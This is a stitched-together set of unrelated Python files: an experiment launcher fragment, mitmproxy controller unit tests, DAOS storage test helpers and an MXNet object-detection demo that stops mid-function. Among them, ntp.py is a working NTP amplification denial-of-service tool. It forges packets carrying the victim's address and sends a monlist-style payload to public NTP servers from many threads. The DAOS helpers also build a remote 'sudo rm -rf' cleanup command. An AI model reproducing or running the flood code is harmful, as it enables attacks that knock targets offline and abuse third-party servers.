system_code = ['cd code && python3 train_policy.py pm --exp_name q3_%s -e 3 --history 60 --discount 0.90 -lr 5e-4 -n 100 --recurrent -s 64 -rs 32 --disjoint_sets --delta 3',
'cd code && python3 train_policy.py pm --exp_name q3_%s -e 3 --history 60 --discount 0.90 -lr 5e-4 -n 100 --recurrent -s 64 -rs 32 --disjoint_sets --delta 5',
'cd code && python3 train_policy.py pm --exp_name q3_%s -e 3 --history 60 --discount 0.90 -lr 5e-4 -n 100 --recurrent -s 64 -rs 32 --disjoint_sets --delta 10']
system_code = [s%(i) for s,i in zip(system_code,exp_names)]
def run_funct(lock, code, gpu):
lock.acquire()
append_str = " --visible_gpus %d"%(gpu)
os.system(code + append_str)
lock.release()
processes = []
locks = [Lock() for _ in range(2)]
for idx, single_code in enumerate(system_code):
p = Process(target=run_funct, args=(locks[idx % len(locks)], single_code, idx % len(locks)))
p.start()
processes.append(p)
for p in processes:
p.join()
folder_names = []
for exp_name in exp_names:
pattern = re.compile('q3_' + exp_name + '_.*')
matching_folders = [os.path.join(data_folder,a) for a in os.listdir(base_folder) if pattern.search(a) is not None]
folder_names.append(matching_folders[0])
os.system('cd code && python3 plot_train_vs_eval.py %s --legend %s'%(' '.join(folder_names), ' '.join(exp_names) ) )
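# Illustrative note (not part of the original script): process idx is serialized on
# locks[idx % 2] and launched with "--visible_gpus (idx % 2)", so the three experiments
# are spread across two GPUs (0, 1, 0) with at most one job per GPU running at a time.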
|
test_controller.py
|
from threading import Thread, Event
from unittest.mock import Mock
import queue
import pytest
from mitmproxy.exceptions import Kill, ControlException
from mitmproxy import controller
from mitmproxy import master
from mitmproxy import proxy
from mitmproxy.test import taddons
class TMsg:
pass
class TestMaster:
def test_simple(self):
class tAddon:
def log(self, _):
ctx.master.should_exit.set()
with taddons.context() as ctx:
ctx.master.addons.add(tAddon())
assert not ctx.master.should_exit.is_set()
msg = TMsg()
msg.reply = controller.DummyReply()
ctx.master.event_queue.put(("log", msg))
ctx.master.run()
assert ctx.master.should_exit.is_set()
def test_server_simple(self):
m = master.Master(None, proxy.DummyServer(None))
m.start()
m.shutdown()
m.start()
m.shutdown()
class TestServerThread:
def test_simple(self):
m = Mock()
t = master.ServerThread(m)
t.run()
assert m.serve_forever.called
class TestChannel:
def test_tell(self):
q = queue.Queue()
channel = controller.Channel(q, Event())
m = Mock(name="test_tell")
channel.tell("test", m)
assert q.get() == ("test", m)
assert m.reply
def test_ask_simple(self):
q = queue.Queue()
def reply():
m, obj = q.get()
assert m == "test"
obj.reply.send(42)
obj.reply.take()
obj.reply.commit()
Thread(target=reply).start()
channel = controller.Channel(q, Event())
assert channel.ask("test", Mock(name="test_ask_simple")) == 42
def test_ask_shutdown(self):
q = queue.Queue()
done = Event()
done.set()
channel = controller.Channel(q, done)
with pytest.raises(Kill):
channel.ask("test", Mock(name="test_ask_shutdown"))
class TestReply:
def test_simple(self):
reply = controller.Reply(42)
assert reply.state == "start"
reply.send("foo")
assert reply.value == "foo"
reply.take()
assert reply.state == "taken"
with pytest.raises(queue.Empty):
reply.q.get_nowait()
reply.commit()
assert reply.state == "committed"
assert reply.q.get() == "foo"
def test_kill(self):
reply = controller.Reply(43)
reply.kill()
reply.take()
reply.commit()
assert reply.q.get() == Kill
def test_ack(self):
reply = controller.Reply(44)
reply.ack()
reply.take()
reply.commit()
assert reply.q.get() == 44
def test_reply_none(self):
reply = controller.Reply(45)
reply.send(None)
reply.take()
reply.commit()
assert reply.q.get() is None
def test_commit_no_reply(self):
reply = controller.Reply(46)
reply.take()
with pytest.raises(ControlException):
reply.commit()
reply.ack()
reply.commit()
def test_double_send(self):
reply = controller.Reply(47)
reply.send(1)
with pytest.raises(ControlException):
reply.send(2)
reply.take()
reply.commit()
def test_state_transitions(self):
states = {"start", "taken", "committed"}
accept = {
"take": {"start"},
"commit": {"taken"},
"ack": {"start", "taken"},
}
for fn, ok in accept.items():
for state in states:
r = controller.Reply(48)
r._state = state
if fn == "commit":
r.value = 49
if state in ok:
getattr(r, fn)()
else:
with pytest.raises(ControlException):
getattr(r, fn)()
r._state = "committed" # hide warnings on deletion
def test_del(self):
reply = controller.Reply(47)
with pytest.raises(ControlException):
reply.__del__()
reply.ack()
reply.take()
reply.commit()
class TestDummyReply:
def test_simple(self):
reply = controller.DummyReply()
for _ in range(2):
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
reply.reset()
assert reply.state == "start"
def test_reset(self):
reply = controller.DummyReply()
reply.ack()
reply.take()
reply.commit()
reply.mark_reset()
assert reply.state == "committed"
reply.reset()
assert reply.state == "start"
def test_del(self):
reply = controller.DummyReply()
reply.__del__()
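# --- Illustrative sketch (not part of the original test module) --------------
# A minimal walk through controller.Reply's state machine, mirroring what the
# tests above assert (start -> taken -> committed); the message value is arbitrary.
def _reply_lifecycle_sketch():
    reply = controller.Reply("some message")  # state == "start"
    reply.send("a value")                     # stage the reply value
    reply.take()                              # state == "taken"
    reply.commit()                            # state == "committed"
    assert reply.q.get() == "a value"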
|
ntp.py
|
#!/usr/bin/env python3
#MIT License
#
#Copyright (c) 2021 Sloobot
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import random
import time
from scapy.all import IP, send, Raw, UDP
from threading import Thread
def NTP_ATTACK(threads, attack_time, target):
# Finish
global FINISH
FINISH = False
target_ip = target.split(":")[0]
target_port = int(target.split(":")[1])
print("\033[1;34m"+"[*]"+"\033[0m"+" Starting NTP attack...")
# Payload
payload = ("\x17\x00\x03\x2a" + "\x00" * 4)
threads_list = []
# Load NTP servers list
with open("tools/L4/ntp_servers.txt", 'r') as f:
ntp_servers = f.readlines()
# NTP flood
def ntp_flood():
global FINISH
while not FINISH:
for server in ntp_servers:
if not FINISH:
# Packet
packets = random.randint(10, 150)
server = server.replace("\n", "")
try:
packet = IP(dst = server, src = target_ip) / UDP(sport = random.randint(2000,65535), dport = int(target_port)) / Raw(load = payload)
send( packet, count = packets, verbose = False)
except Exception as e:
print(e)
else:
print("\033[1;34m"+"[*]"+"\033[0m"+" Sending " + str(packets) + " packets from NTP server: " + server + " to " + target + "...")
# Start threads
for thread in range(threads):
print("\033[1;34m"+"[*]"+"\033[0m"+" Staring thread " + str(thread) + "...")
t = Thread(target = ntp_flood)
t.start()
threads_list.append(t)
# Sleep selected secounds
time.sleep(attack_time)
# Terminate threads
for thread in threads_list:
FINISH = True
thread.join()
print("\033[1;33m"+"[!]"+"\033[0m"+" Attack completed.")
|
osa_utils.py
|
#!/usr/bin/python3
"""
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
import ctypes
import queue
import time
import threading
import re
from avocado import fail_on
from ior_test_base import IorTestBase
from mdtest_test_base import MdtestBase
from exception_utils import CommandFailure
from pydaos.raw import (DaosContainer, IORequest,
DaosObj, DaosApiError)
from general_utils import create_string_buffer, run_command
class OSAUtils(MdtestBase, IorTestBase):
# pylint: disable=too-many-ancestors
"""
Test Class Description: This test runs
daos_server offline drain test cases.
:avocado: recursive
"""
def setUp(self):
"""Set up for test case."""
super().setUp()
self.pool_cont_dict = {}
self.container = None
self.obj = None
self.ioreq = None
self.dmg_command = self.get_dmg_command()
self.no_of_dkeys = self.params.get("no_of_dkeys", '/run/dkeys/*',
default=[0])[0]
self.no_of_akeys = self.params.get("no_of_akeys", '/run/akeys/*',
default=[0])[0]
self.record_length = self.params.get("length", '/run/record/*',
default=[0])[0]
self.ior_w_flags = self.params.get("write_flags", '/run/ior/iorflags/*',
default="")
self.ior_r_flags = self.params.get("read_flags", '/run/ior/iorflags/*')
self.server_count = len(self.hostlist_servers)
self.engine_count = self.server_managers[0].get_config_value(
"engines_per_host")
self.out_queue = queue.Queue()
self.dmg_command.exit_status_exception = False
self.test_during_aggregation = False
self.test_during_rebuild = False
self.test_with_checksum = True
# By default, test_with_rf is set to False.
# It is up to individual test to enable it.
self.test_with_rf = False
self.test_with_blank_node = False
self.test_with_snapshot = False
@fail_on(CommandFailure)
def get_pool_leader(self):
"""Get the pool leader.
Returns:
int: pool leader value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["leader"])
@fail_on(CommandFailure)
def get_rebuild_status(self):
"""Get the rebuild status.
Returns:
str: rebuild status
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["status"]
@fail_on(CommandFailure)
def get_rebuild_state(self):
"""Get the rebuild state.
Returns:
str: rebuild state
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return data["response"]["rebuild"]["state"]
@fail_on(CommandFailure)
def is_rebuild_done(self, time_interval,
wait_for_rebuild_to_complete=False):
"""Rebuild is completed/done.
Args:
time_interval: Wait interval between checks
wait_for_rebuild_to_complete: Rebuild completed
(Default: False)
"""
self.pool.wait_for_rebuild(wait_for_rebuild_to_complete,
interval=time_interval)
@fail_on(CommandFailure)
def assert_on_rebuild_failure(self):
"""If the rebuild is not successful,
        raise an assertion error.
"""
rebuild_status = self.get_rebuild_status()
self.log.info("Rebuild Status: %s", rebuild_status)
rebuild_failed_string = ["failed", "scanning", "aborted", "busy"]
self.assertTrue(rebuild_status not in rebuild_failed_string,
"Rebuild failed")
@fail_on(CommandFailure)
def print_and_assert_on_rebuild_failure(self, out, timeout=3):
"""Print the out value (daos, dmg, etc) and check for rebuild
        completion. If not, raise an assertion error.
"""
self.log.info(out)
self.is_rebuild_done(timeout)
self.assert_on_rebuild_failure()
@fail_on(CommandFailure)
def get_pool_version(self):
"""Get the pool version.
Returns:
int: pool_version_value
"""
data = self.dmg_command.pool_query(self.pool.uuid)
return int(data["response"]["version"])
@fail_on(CommandFailure)
def get_ipaddr_for_rank(self, rank=None):
"""Obtain the IPAddress and port number for a
particular server rank.
Args:
rank (int): daos_engine rank. Defaults to None.
Returns:
ip_addr (str) : IPAddress for the rank.
port_num (str) : Port number for the rank.
"""
output = self.dmg_command.system_query()
members_length = self.server_count * self.engine_count
for i in range(0, members_length):
if rank == int(output["response"]["members"][i]["rank"]):
temp = output["response"]["members"][i]["addr"]
ip_addr = temp.split(":")
temp = output["response"]["members"][i]["fabric_uri"]
port_num = temp.split(":")
return ip_addr[0], port_num[2]
return None, None
@fail_on(CommandFailure)
def remove_pool_dir(self, ip_addr=None, port_num=None):
"""Remove the /mnt/daos[x]/<pool_uuid>/vos-* directory
Args:
ip_addr (str): IP address of the daos server.
Defaults to None.
            port_num (str) : Port number of the daos server.
"""
# Create the expected port list
# expected_ports = [port0] - Single engine/server
# expected_ports = [port0, port1] - Two engine/server
expected_ports = [engine_param.get_value("fabric_iface_port")
for engine_param in self.server_managers[-1].
manager.job.yaml.engine_params]
self.log.info("Expected ports : %s", expected_ports)
if ip_addr is None or port_num is None:
self.log.info("ip_addr : %s port_number: %s", ip_addr, port_num)
self.fail("No IP Address or Port number provided")
else:
if self.engine_count == 1:
self.log.info("Single Engine per Server")
cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
sudo rm -rf /mnt/daos/{}/vos-*". \
format(ip_addr, self.pool.uuid)
elif self.engine_count == 2:
if port_num == str(expected_ports[0]):
port_val = 0
elif port_num == str(expected_ports[1]):
port_val = 1
else:
self.log.info("port_number: %s", port_num)
self.fail("Invalid port number")
cmd = "/usr/bin/ssh {} -oStrictHostKeyChecking=no \
sudo rm -rf /mnt/daos{}/{}/vos-*". \
format(ip_addr, port_val, self.pool.uuid)
else:
self.fail("Not supported engine per server configuration")
run_command(cmd)
def set_container(self, container):
"""Set the OSA utils container object.
Args:
container (obj) : Container object to be used
within OSA utils.
"""
self.container = container
def simple_osa_reintegrate_loop(self, rank, action="exclude",
loop_time=100):
"""This method performs exclude or drain and
reintegration on a rank for a certain amount of time.
Args:
rank (int): daos server rank.
action (str) : "exclude" or "drain".
Defaults to "exclude"
loop_time: Total time to perform drain/reintegrate
operation in a loop. (Default : 100 secs)
"""
start_time = 0
finish_time = 0
start_time = time.time()
while int(finish_time - start_time) < loop_time:
if action == "exclude":
output = self.dmg_command.pool_exclude(self.pool.uuid,
rank)
else:
output = self.dmg_command.pool_drain(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
output = self.dmg_command.pool_reintegrate(self.pool.uuid,
rank)
self.print_and_assert_on_rebuild_failure(output)
finish_time = time.time()
@fail_on(DaosApiError)
def write_single_object(self):
"""Write some data to the existing pool."""
self.pool.connect(2)
csum = self.params.get("enable_checksum", '/run/container/*')
self.container = DaosContainer(self.context)
input_param = self.container.cont_input_values
input_param.enable_chksum = csum
self.container.create(poh=self.pool.pool.handle,
con_prop=input_param)
self.container.open()
self.obj = DaosObj(self.context, self.container)
self.obj.create(objcls=1)
self.obj.open()
self.ioreq = IORequest(self.context,
self.container,
self.obj, objtype=4)
self.log.info("Writing the Single Dataset")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0])
* self.record_length)
d_key_value = "dkey {0}".format(dkey)
c_dkey = create_string_buffer(d_key_value)
a_key_value = "akey {0}".format(akey)
c_akey = create_string_buffer(a_key_value)
c_value = create_string_buffer(indata)
c_size = ctypes.c_size_t(ctypes.sizeof(c_value))
self.ioreq.single_insert(c_dkey, c_akey, c_value, c_size)
self.obj.close()
self.container.close()
@fail_on(DaosApiError)
def verify_single_object(self):
"""Verify the container data on the existing pool."""
self.pool.connect(2)
self.container.open()
self.obj.open()
self.log.info("Single Dataset Verification -- Started")
for dkey in range(self.no_of_dkeys):
for akey in range(self.no_of_akeys):
indata = ("{0}".format(str(akey)[0]) *
self.record_length)
c_dkey = create_string_buffer("dkey {0}".format(dkey))
c_akey = create_string_buffer("akey {0}".format(akey))
val = self.ioreq.single_fetch(c_dkey,
c_akey,
len(indata) + 1)
if indata != (repr(val.value)[1:-1]):
self.d_log.error("ERROR:Data mismatch for "
"dkey = {0}, "
"akey = {1}".format(
"dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.fail("ERROR: Data mismatch for dkey = {0}, akey={1}"
.format("dkey {0}".format(dkey),
"akey {0}".format(akey)))
self.obj.close()
self.container.close()
def prepare_cont_ior_write_read(self, oclass, flags):
"""This method prepares the containers for
IOR write and read invocations.
To enable aggregation:
- Create two containers and read always from
first container
Normal usage (use only a single container):
- Create a single container and use the same.
Args:
oclass (str): IOR object class
flags (str): IOR flags
"""
self.log.info(self.pool_cont_dict)
# If pool is not in the dictionary,
# initialize its container list to None
        # {poolA : [None, None, None, None]}
if self.pool not in self.pool_cont_dict:
self.pool_cont_dict[self.pool] = [None] * 4
# Create container if the pool doesn't have one.
# Otherwise, use the existing container in the pool.
        # pool_cont_dict {pool A: [containerA, Updated, containerB, Updated],
        #                 pool B: [containerA, Updated, containerB, None]}
if self.pool_cont_dict[self.pool][0] is None:
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][0] = self.container
self.pool_cont_dict[self.pool][1] = "Updated"
else:
if ((self.test_during_aggregation is True) and
(self.pool_cont_dict[self.pool][1] == "Updated") and
(self.pool_cont_dict[self.pool][3] is None) and
("-w" in flags)):
# Write to the second container
self.add_container(self.pool, create=False)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
self.container.create()
self.pool_cont_dict[self.pool][2] = self.container
self.pool_cont_dict[self.pool][3] = "Updated"
else:
self.container = self.pool_cont_dict[self.pool][0]
def delete_extra_container(self, pool):
"""Delete the extra container in the pool.
Refer prepare_cont_ior_write_read. This method
should be called when OSA tests intend to
enable aggregation.
Args:
pool (object): pool handle
"""
self.pool.set_property("reclaim", "time")
extra_container = self.pool_cont_dict[pool][2]
extra_container.destroy()
self.pool_cont_dict[pool][3] = None
def get_object_replica_value(self, oclass):
""" Get the object replica value for an object class.
Args:
oclass (str): Object Class (eg: RP_2G1,etc)
Returns:
value (int) : Object replica value
"""
value = 0
if "_" in oclass:
replica_list = oclass.split("_")
value = replica_list[1][0]
else:
self.log.info("Wrong Object Class. Cannot split")
return int(value)
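    # Illustrative example (not part of the original code):
    # get_object_replica_value("RP_2G1") -> 2, while an "S1"-style class
    # (no "_" in the name) falls through and returns 0.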
def update_cont_properties(self, cont_prop):
"""Update the existing container properties.
Args:
cont_prop (str): Replace existing container properties
with new value
"""
self.container.properties.value = cont_prop
def set_cont_class_properties(self, oclass="S1"):
"""Update the container class to match the IOR/Mdtest object
class. Fix the rf factor based on object replica value.
Also, remove the redundancy factor for S type
object class.
Args:
oclass (str, optional): Container object class to be set.
Defaults to "S1".
"""
self.container.oclass.value = oclass
        # Set the container properties properly for S1, S2 class.
# rf should not be set to 1 for S type object class.
x = re.search("^S\\d$", oclass)
prop = self.container.properties.value
if x is not None:
prop = prop.replace("rf:1", "rf:0")
else:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
prop = prop.replace("rf:1", rf_value)
self.container.properties.value = prop
# Over-write oclass settings if using redundancy factor
# and self.test_with_rf is True.
# This has to be done so that container created doesn't
# use the object class.
if self.test_with_rf is True and \
"rf" in self.container.properties.value:
self.log.info(
"Detected container redundancy factor: %s",
self.container.properties.value)
self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
self.container.oclass.update(None)
def assert_on_exception(self, out_queue=None):
"""Assert on exception while executing an application.
Args:
out_queue (queue): Check whether the queue is
empty. If empty, app (ior, mdtest) didn't encounter error.
"""
if out_queue is None:
out_queue = self.out_queue
if out_queue.empty():
pass
else:
exc = out_queue.get(block=False)
out_queue.put(exc)
raise CommandFailure(exc)
def cleanup_queue(self, out_queue=None):
"""Cleanup the existing thread queue.
Args:
out_queue (queue): Queue to cleanup.
"""
if out_queue is None:
out_queue = self.out_queue
while not out_queue.empty():
out_queue.get(block=True)
def run_ior_thread(self, action, oclass, test, single_cont_read=True,
fail_on_warning=True, pool=None):
"""Start the IOR thread for either writing or
reading data to/from a container.
Args:
action (str): Start the IOR thread with Read or
Write
oclass (str): IOR object class
test (list): IOR test sequence
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
pool (TestPool): Pool to run ior on. Defaults to None.
"""
# Intermediate (between correct and hack) implementation for allowing a
# pool to be passed in. Needs to be fixed by making the pool argument
# required.
if pool is None:
pool = self.pool
self.cleanup_queue()
if action == "Write":
flags = self.ior_w_flags
else:
flags = self.ior_r_flags
# Add a thread for these IOR arguments
process = threading.Thread(target=self.ior_thread,
kwargs={"pool": pool,
"oclass": oclass,
"test": test,
"flags": flags,
"single_cont_read":
single_cont_read,
"fail_on_warning":
fail_on_warning})
# Launch the IOR thread
process.start()
# Wait for the thread to finish
process.join()
if not self.out_queue.empty():
self.assert_on_exception()
def ior_thread(self, pool, oclass, test, flags,
single_cont_read=True,
fail_on_warning=True):
"""Start an IOR thread.
Args:
pool (object): pool handle
oclass (str): IOR object class, container class.
test (list): IOR test sequence
flags (str): IOR flags
single_cont_read (bool) : Always read from the
1st container.
Defaults to True.
fail_on_warning (bool) : Test terminates
for IOR warnings.
Defaults to True.
"""
self.cleanup_queue()
self.pool = pool
self.ior_cmd.get_params(self)
self.ior_cmd.set_daos_params(self.server_group, self.pool)
self.log.info("Redundancy Factor : %s", self.test_with_rf)
self.ior_cmd.dfs_oclass.update(oclass)
self.ior_cmd.dfs_dir_oclass.update(oclass)
if single_cont_read is True:
# Prepare the containers created and use in a specific
            # way defined in prepare_cont_ior_write_read.
self.prepare_cont_ior_write_read(oclass, flags)
elif single_cont_read is False and self.container is not None:
# Here self.container is having actual value. Just use it.
self.log.info(self.container)
else:
self.fail("Not supported option on ior_thread")
try:
job_manager = self.get_ior_job_manager_command()
except CommandFailure as err_msg:
self.out_queue.put(err_msg)
self.assert_on_exception()
job_manager.job.dfs_cont.update(self.container.uuid)
self.ior_cmd.transfer_size.update(test[2])
self.ior_cmd.block_size.update(test[3])
self.ior_cmd.flags.update(flags)
# Update oclass settings if using redundancy factor
# and self.test_with_rf is True.
if self.test_with_rf is True and \
"rf" in self.container.properties.value:
self.log.info(
"Detected container redundancy factor: %s",
self.container.properties.value)
self.ior_cmd.dfs_oclass.update(None, "ior.dfs_oclass")
self.ior_cmd.dfs_dir_oclass.update(None, "ior.dfs_dir_oclass")
self.run_ior_with_pool(create_pool=False, create_cont=False,
fail_on_warning=fail_on_warning,
out_queue=self.out_queue)
if not self.out_queue.empty():
self.assert_on_exception()
def run_mdtest_thread(self, oclass="RP_2G1"):
"""Start mdtest thread and wait until thread completes.
Args:
oclass (str): IOR object class, container class.
"""
# Create container only
self.mdtest_cmd.dfs_destroy = False
create_container = 0
if self.container is None:
self.add_container(self.pool, create=False)
create_container = 1
self.mdtest_cmd.dfs_oclass.update(oclass)
self.set_cont_class_properties(oclass)
if self.test_with_checksum is False:
tmp = self.get_object_replica_value(oclass)
rf_value = "rf:{}".format(tmp - 1)
self.update_cont_properties(rf_value)
if create_container == 1:
self.container.create()
job_manager = self.get_mdtest_job_manager_command(self.manager)
job_manager.job.dfs_cont.update(self.container.uuid)
# Add a thread for these IOR arguments
process = threading.Thread(target=self.execute_mdtest)
# Launch the MDtest thread
process.start()
# Wait for the thread to finish
process.join()
if not self.out_queue.empty():
self.assert_on_exception()
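    # Illustrative usage (not part of the original class; the test sequence values
    # below are hypothetical): a subclass could write and then read back data with
    #   self.run_ior_thread("Write", oclass="RP_2G1", test=[1, 1, "4k", "32M"])
    #   self.run_ior_thread("Read",  oclass="RP_2G1", test=[1, 1, "4k", "32M"])
    # where test[2] and test[3] feed the IOR transfer and block sizes in ior_thread().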
|
mul_f.py
|
from __future__ import print_function
import argparse
import os
import cv2
import time
import mxnet as mx
import numpy as np
from rcnn.config import config
from rcnn.symbol import get_vggm_test, get_vggm_rpn_test
from rcnn.symbol import get_vgg_test, get_vgg_rpn_test
from rcnn.symbol import get_resnet_test
from rcnn.io.image import resize, transform
from rcnn.core.tester import Predictor, im_detect, im_proposal, vis_all_detection, draw_all_detection
from rcnn.utils.load_model import load_param
from rcnn.processing.nms import py_nms_wrapper, cpu_nms_wrapper, gpu_nms_wrapper
import cv2
import sys
import multiprocessing
from time import time
import Queue
import kcftracker
CLASSES = ('__background__',
'car', 'coach', 'truck', 'person', 'tanker')
config.TEST.HAS_RPN = True
SHORT_SIDE = config.SCALES[0][0]
LONG_SIDE = config.SCALES[0][1]
PIXEL_MEANS = config.PIXEL_MEANS
DATA_NAMES = ['data', 'im_info']
LABEL_NAMES = None
DATA_SHAPES = [('data', (1, 3, LONG_SIDE, SHORT_SIDE)), ('im_info', (1, 3))]
LABEL_SHAPES = None
# visualization
CONF_THRESH = 0.5
NMS_THRESH = 0.3
nms = py_nms_wrapper(NMS_THRESH)
def get_net(symbol, prefix, epoch, ctx):
arg_params, aux_params = load_param(prefix, epoch, convert=True, ctx=ctx, process=True)
# infer shape
data_shape_dict = dict(DATA_SHAPES)
arg_names, aux_names = symbol.list_arguments(), symbol.list_auxiliary_states()
arg_shape, _, aux_shape = symbol.infer_shape(**data_shape_dict)
arg_shape_dict = dict(zip(arg_names, arg_shape))
aux_shape_dict = dict(zip(aux_names, aux_shape))
# check shapes
for k in symbol.list_arguments():
if k in data_shape_dict or 'label' in k:
continue
assert k in arg_params, k + ' not initialized'
assert arg_params[k].shape == arg_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(arg_shape_dict[k]) + ' provided ' + str(
arg_params[k].shape)
for k in symbol.list_auxiliary_states():
assert k in aux_params, k + ' not initialized'
assert aux_params[k].shape == aux_shape_dict[k], \
'shape inconsistent for ' + k + ' inferred ' + str(aux_shape_dict[k]) + ' provided ' + str(
aux_params[k].shape)
predictor = Predictor(symbol, DATA_NAMES, LABEL_NAMES, context=ctx,
provide_data=DATA_SHAPES, provide_label=LABEL_SHAPES,
arg_params=arg_params, aux_params=aux_params)
return predictor
def generate_batch(im):
"""
preprocess image, return batch
:param im: cv2.imread returns [height, width, channel] in BGR
:return:
data_batch: MXNet input batch
data_names: names in data_batch
im_scale: float number
"""
im_array, im_scale = resize(im, SHORT_SIDE, LONG_SIDE)
im_array = transform(im_array, PIXEL_MEANS)
im_info = np.array([[im_array.shape[2], im_array.shape[3], im_scale]], dtype=np.float32)
data = [mx.nd.array(im_array), mx.nd.array(im_info)]
data_shapes = [('data', im_array.shape), ('im_info', im_info.shape)]
data_batch = mx.io.DataBatch(data=data, label=None, provide_data=data_shapes, provide_label=None)
return data_batch, DATA_NAMES, im_scale
detect_num = {c: 0 for c in CLASSES}
tp, fp, fn = 0, 0, 0
gp, gr, gf1 = 0, 0, 0
def iou(rect1, rect2):
iou = 0
if rect1[0] < rect2[2] and rect1[2] > rect2[0] and rect1[1] < rect2[3] and rect1[3] > rect2[1]:
        i = (min(rect1[2], rect2[2]) - max(rect1[0], rect2[0])) * (min(rect1[3], rect2[3]) - max(rect1[1], rect2[1]))
o = (rect1[2] - rect1[0]) * (rect1[3] - rect1[1]) + (rect2[2] - rect2[0]) * (rect2[3] - rect2[1]) - i
iou = i / o
return iou
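# Sanity check (illustrative, not part of the original code); float inputs avoid
# Python 2 integer division: iou([0., 0., 10., 10.], [5., 5., 15., 15.]) == 25.0 / 175.0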
def demo_net(predictor, image_name, image, with_label, vis, out_dir, label_dir):
"""
generate data_batch -> im_detect -> post process
:param predictor: Predictor
:param image_name: image name
:param vis: will save as a new image if not visualized
:return: None
"""
global detect_num
global tp, fp, fn
global gp, gr, gf1
if (type(image_name)==str):
assert os.path.exists(image_name), image_name + ' not found'
im = cv2.imread(image_name)
else:
im = image
# im = cv2.flip(im, 1)
data_batch, data_names, im_scale = generate_batch(im)
# for i in range(10):
# scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
for i in range(1):
scores, boxes, data_dict = im_detect(predictor, data_batch, data_names, im_scale)
xn = []
yn = []
wn = []
hn = []
all_boxes = [[] for _ in CLASSES]
for cls in CLASSES:
cls_ind = CLASSES.index(cls)
cls_boxes = boxes[:, 4 * cls_ind:4 * (cls_ind + 1)]
cls_scores = scores[:, cls_ind, np.newaxis]
keep = np.where(cls_scores >= CONF_THRESH)[0]
dets = np.hstack((cls_boxes, cls_scores)).astype(np.float32)[keep, :]
keep = nms(dets)
all_boxes[cls_ind] = dets[keep, :]
boxes_this_image = [[]] + [all_boxes[j] for j in range(1, len(CLASSES))]
# print(boxes_this_image)
# print results
rst = {};
lfn, lfp, ltp = 0, 0, 0
#print('class ---- [[x1, x2, y1, y2, confidence]]')
for ind, boxes in enumerate(boxes_this_image):
if len(boxes) > 0:
#print('---------', CLASSES[ind], '---------')
#print(boxes)
for i in range(0, len(boxes)):
xn.append(int(boxes[i][0] + 0))
yn.append(int(boxes[i][1] + 0))
wn.append(int(boxes[i][2] - boxes[i][0]))
hn.append(int(boxes[i][3] - boxes[i][1]))
#rst[CLASSES[ind]] = [box for box in boxes]
# detect_num[CLASSES[ind]] += len(boxes)
#detect_num[CLASSES[ind]] += 1 # len(boxes)
"""if image == '' and with_label:
label_file = os.path.join(label_dir, os.path.split(image_name.replace('.jpg', '.txt'))[1])
with open(label_file) as fd:
for line in fd:
cls, poss = line.split(':')
x1, y1, x2, y2 = [float(item) for item in poss.split(',')]
if cls not in rst:
lfn += 1
continue
iou_thd = 0.5
now_iou = 0
now_idx = 0
for ind, box in enumerate(rst[cls]):
# print('box = ', box, type(box))
# print('box = {}, true = {}'.format(box, (x1, y1, x2, y2)))
if (box[0] >= x2) or (box[2] <= x1) or (box[1] >= y2) or (box[3] <= y1):
continue
else:
# print('###############################################')
i = (min(x2, box[2]) - max(x1, box[0])) * (min(y2, box[3]) - max(y1, box[1]))
assert (i > 0)
u = (x2 - x1) * (y2 - y1) + (box[0] - box[2]) * (box[1] - box[3]) - i
if i / u > now_iou:
now_iou = i / u
now_idx = ind
if now_iou > iou_thd:
ltp += 1
rst[cls].pop(now_idx)
if len(rst[cls]) == 0: rst.pop(cls)
else:
lfn += 1
for vs in rst.values():
lfp += len(vs)
p, r, f1 = 0, 0, 0
if ltp != 0:
p = 100.0 * ltp / (ltp + lfp)
r = 100.0 * ltp / (ltp + lfn)
f1 = 2 * p * r / (p + r)
print('precision = {}%, recall = {}%, f1 score = {}%'.format(p, r, f1))
tp += ltp
fp += lfp
fn += lfn
gp += p
gr += r
gf1 += f1"""
"""if vis:
vis_all_detection(data_dict['data'].asnumpy(), boxes_this_image, CLASSES, im_scale)
else:
# print(os.path.join(args.out_dir, os.path.split(image_name.replace('.jpg', '_result.jpg'))[1]))
